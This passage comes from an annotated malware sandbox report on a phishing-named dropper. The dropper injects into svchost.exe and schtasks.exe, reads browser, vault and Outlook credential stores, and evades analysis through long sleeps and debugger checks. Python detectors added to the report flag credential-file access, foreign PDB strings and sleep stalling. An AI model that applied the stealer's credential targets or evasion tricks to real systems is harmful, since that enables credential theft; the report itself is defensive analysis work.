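SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
# Constructed events mirroring the report; the "Login Data" read is an assumption.
EVENTS = [
    (SCHTASKS, "image_load", "winsqlite3.dll"),
    (SCHTASKS, "image_load", "vaultcli.dll"),
    (SCHTASKS, "image_load", "dpapi.dll"),
    (SCHTASKS, "reg_open", r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook"),
    (SCHTASKS, "memory_string", "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, "
                                "parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE"),
    (SCHTASKS, "file_read", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Program Files\Mozilla Firefox\firefox.exe", "file_read",
     r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
]

if __name__ == "__main__":
    for proc, finding in credential_findings(EVENTS):
        print(proc, finding)
```

            Note the caveat the firefox.exe event illustrates: the report shows Firefox reading profiles.ini only because the stealer launched it, so an owner allow-list alone would not flag that read; it is the schtasks.exe-to-firefox.exe parent relationship, not the file access, that exposes it.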
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000001.00000003.1919524011.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919657751.0000000003649000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015BB000.00000004.00000001.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015E4000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MHFAGZiftf.exe, 00000003.00000002.4110802051.000000000021E000.00000002.00000001.01000000.00000005.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021295588.000000000021E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655348276.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655471454.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1853902441.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851162976.0000000003800000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1951317071.000000000332F000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.0000000003680000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.000000000381E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1953664932.00000000034D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655348276.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655471454.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1951185289.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1853902441.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851162976.0000000003800000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000003.1951317071.000000000332F000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.0000000003680000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.000000000381E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1953664932.00000000034D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4112702566.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2240961982.000000000199C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000001.00000003.1919524011.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919657751.0000000003649000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015BB000.00000004.00000001.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015E4000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4112702566.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2240961982.000000000199C000.00000004.80000000.00040000.00000000.sdmp
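            The PDB strings above are injection evidence in their own right: schtasks.pdb turns up in the memory of svchost.exe and MHFAGZiftf.exe, and svchost.pdb in schtasks.exe, MHFAGZiftf.exe and firefox.exe, meaning each process carries a copy of another Windows binary's image. The following is an added example, not code from the report or from Joe Sandbox, that parses "Binary string: ... source: ..." lines of this form and flags a Windows executable's PDB appearing in a differently named process. The sample lines are abridged from the report (fewer memory-dump identifiers); the list of PDB stems treated as host-bound is an assumption.

```python
import ntpath
import re

LINE_RE = re.compile(r"Binary string:\s*(?P<pdb>\S+)\s+source:\s*(?P<sources>.+)$")

# Assumption: PDBs of these Windows executables should only appear inside the same-named image.
WINDOWS_EXE_PDBS = {"svchost", "schtasks", "explorer", "rundll32", "regsvr32"}


def parse_binary_string_line(line):
    """Return (pdb basename, sorted list of process names) or None if the line does not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    raw = m.group("pdb")
    # Memory strings run into neighbouring bytes ("wntdll.pdbUGP"), so cut at ".pdb".
    idx = raw.lower().find(".pdb")
    pdb = ntpath.basename(raw[: idx + 4]) if idx >= 0 else raw
    tokens = [t.strip() for t in m.group("sources").split(",")]
    processes = sorted({t for t in tokens if t.lower().endswith(".exe")})
    return pdb, processes


def pdb_host_mismatches(lines):
    """Yield (pdb, process) pairs where a host-bound PDB shows up in a foreign process."""
    findings = []
    for line in lines:
        parsed = parse_binary_string_line(line)
        if not parsed:
            continue
        pdb, procs = parsed
        stem = pdb[:-4].lower()
        if stem not in WINDOWS_EXE_PDBS:
            continue  # DLL PDBs such as wntdll.pdb are expected in every process
        for proc in procs:
            if proc.lower() != stem + ".exe":
                findings.append((pdb, proc))
    return findings


# Abridged from the report's lines; each keeps one memory dump per process.
REPORT_LINES = [
    r"Source: Binary string: schtasks.pdb source: svchost.exe, 00000001.00000003.1919524011.000000000361A000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015BB000.00000004.00000001.00020000.00000000.sdmp",
    r"Source: Binary string: wntdll.pdbUGP source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655348276.0000000003730000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003C00000.00000040.00001000.00020000.00000000.sdmp",
    r"Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4112702566.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2240961982.000000000199C000.00000004.80000000.00040000.00000000.sdmp",
    r"Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MHFAGZiftf.exe, 00000003.00000002.4110802051.000000000021E000.00000002.00000001.01000000.00000005.sdmp",
]

if __name__ == "__main__":
    for pdb, proc in pdb_host_mismatches(REPORT_LINES):
        print(f"{pdb} found in {proc}")
```

            The wntdll.pdb line is deliberately not flagged here: ntdll is mapped into every process, so its PDB alone proves nothing. What makes it interesting in this report is that it appears in freshly allocated regions of the dropper and of svchost.exe, which matches the "direct / indirect syscall" signature (a second, unhooked ntdll copy), but that is a memory-layout question this line-level parser cannot answer.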
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_002842DE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A0A76 push ecx; ret | 0_2_002A0A89
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040209E push esp; ret | 1_2_004020A4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004050AF push 660EA6FEh; ret | 1_2_004050B4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004121DC push ebp; retf | 1_2_004121F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004121DC push ecx; iretd | 1_2_0041222E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004019E0 push esp; ret | 1_2_00401A04
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00412210 push ecx; iretd | 1_2_0041222E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E2B4 push ss; ret | 1_2_0041E2C5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E36A push edx; iretd | 1_2_0041E372
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D48B pushfd ; ret | 1_2_0040D48F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004145F7 push eax; iretd | 1_2_00414687
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00419D8E push ss; ret | 1_2_00419D8F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A5AB push ss; retf | 1_2_0041A645
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403660 push eax; ret | 1_2_00403662
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004076F8 push edi; retf | 1_2_0040771F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0225F pushad ; ret | 1_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C027FA pushad ; ret | 1_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx | 1_2_03C309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0283D push eax; iretd | 1_2_03C02858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C01368 push eax; iretd | 1_2_03C01369
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C01065 push edi; ret | 1_2_03C0108A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C018F3 push edx; iretd | 1_2_03C01906
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E91366 pushfd ; ret | 3_2_03E9136A
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03EA2245 push edx; iretd | 3_2_03EA224D
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03EA218F push ss; ret | 3_2_03EA21A0
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E960EB push ecx; iretd | 3_2_03E96109
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E960B7 push ebp; retf | 3_2_03E960D1
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E960B7 push ecx; iretd | 3_2_03E96109
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E88F8A push 660EA6FEh; ret | 3_2_03E88F8F
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03EA6F0D push 195B6DB7h; iretd | 3_2_03EA6F14
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Code function: 3_2_03E8B5E5 push edi; retf | 3_2_03E8B5FA
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | File created: \scanned docs from emnes metal sdn bhd_.exe

            Boot Survival

            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_0029F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_0029F98E
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_00311C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_00311C41
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep | graph_0-96192
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | API/Special instruction interceptor: Address: 3203234
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc | 1_2_03C7096E
            Source: C:\Windows\SysWOW64\schtasks.exe | Window / User API: threadDelayed 9780
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | API coverage: 3.9 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\schtasks.exe | API coverage: 2.3 %
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 5000 | Thread sleep count: 192 > 30
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 5000 | Thread sleep time: -384000s >= -30000s
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 5000 | Thread sleep count: 9780 > 30
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 5000 | Thread sleep time: -19560000s >= -30000s
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968 | Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968 | Thread sleep count: 34 > 30
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968 | Thread sleep time: -51000s >= -30000s
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968 | Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968 | Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\schtasks.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\schtasks.exe | Last function: Thread delayed
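            The sleep signatures above are per-thread aggregates: the sandbox counts delay calls per thread and sums the requested intervals, and fires when a thread exceeds 30 calls or 30 seconds of cumulative delay, the thresholds printed in the "> 30" and ">= -30000s" comparisons. The following is an added example, not Joe Sandbox's code, that reproduces that heuristic over a constructed API trace. It assumes the same two thresholds, and it normalises NtDelayExecution arguments using the documented Windows convention that a negative DelayInterval is a relative delay in 100-nanosecond units (a positive value is an absolute time, which is reported separately because it cannot be summed). The thread IDs 5000 and 6968 are taken from the report; the call counts and intervals are constructed.

```python
from collections import defaultdict


def delay_ms(api, arg):
    """Normalise a Sleep/NtDelayExecution argument to milliseconds (None for absolute times)."""
    if api == "Sleep":
        return float(arg)                 # Sleep(dwMilliseconds)
    if api == "NtDelayExecution":
        if arg < 0:
            return -arg / 10_000          # relative LARGE_INTEGER in 100-ns units
        return None                       # positive = absolute system time
    raise ValueError(f"unsupported API {api}")


def sleep_evasion_findings(trace, count_threshold=30, total_ms_threshold=30_000):
    """Return (tid, rule, value) for threads that look like they are stalling the sandbox."""
    per_thread = defaultdict(lambda: {"count": 0, "total_ms": 0.0, "absolute": 0})
    for tid, api, arg in trace:
        stats = per_thread[tid]
        ms = delay_ms(api, arg)
        if ms is None:
            stats["absolute"] += 1
            continue
        stats["count"] += 1
        stats["total_ms"] += ms
    findings = []
    for tid, s in sorted(per_thread.items()):
        if s["count"] > count_threshold:
            findings.append((tid, "sleep_count", s["count"]))
        if s["total_ms"] >= total_ms_threshold:
            findings.append((tid, "sleep_total_ms", s["total_ms"]))
        if s["absolute"]:
            findings.append((tid, "absolute_delay", s["absolute"]))
    return findings


# Constructed trace: many short NtDelayExecution calls on TID 5000, 34 one-second Sleeps on
# TID 6968, and a benign thread that sleeps three times for 50 ms.
TRACE = (
    [(5000, "NtDelayExecution", -20_000_000)] * 40   # 2 s each, relative
    + [(6968, "Sleep", 1000)] * 34
    + [(1234, "Sleep", 50)] * 3
)

if __name__ == "__main__":
    for tid, rule, value in sleep_evasion_findings(TRACE):
        print(f"TID {tid}: {rule} = {value}")
```

            Splitting the requested interval into many short calls, as TID 5000 does here, defeats a sandbox that only patches long single sleeps; that is why the count rule exists alongside the total, and why both fire for the schtasks.exe thread in the report.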
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_002EDBBE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002F68EE FindFirstFileW,FindClose | 0_2_002F68EE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_002F698F
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_002ED076
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_002ED3A9
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_002F9642
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_002F979D
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_002F9B2B
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002F5C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_002F5C97
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B2BAB0 FindFirstFileW,FindNextFileW,FindClose | 4_2_02B2BAB0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_002842DE
            Source: MHFAGZiftf.exe, 00000007.00000002.4111361762.000000000065F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2244405329.000002308191C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\schtasks.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc | 1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417783 LdrLoadDll | 1_2_00417783
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002FEAA2 BlockInput | 0_2_002FEAA2
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_002B2622
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_002842DE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_002A4CE8 mov eax, dword ptr fs:[00000030h] | 0_2_002A4CE8
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_03203500 mov eax, dword ptr fs:[00000030h] | 0_2_03203500
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_032034A0 mov eax, dword ptr fs:[00000030h] | 0_2_032034A0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: 0_2_03201E70 mov eax, dword ptr fs:[00000030h] | 0_2_03201E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h] | 1_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h] | 1_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] | 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
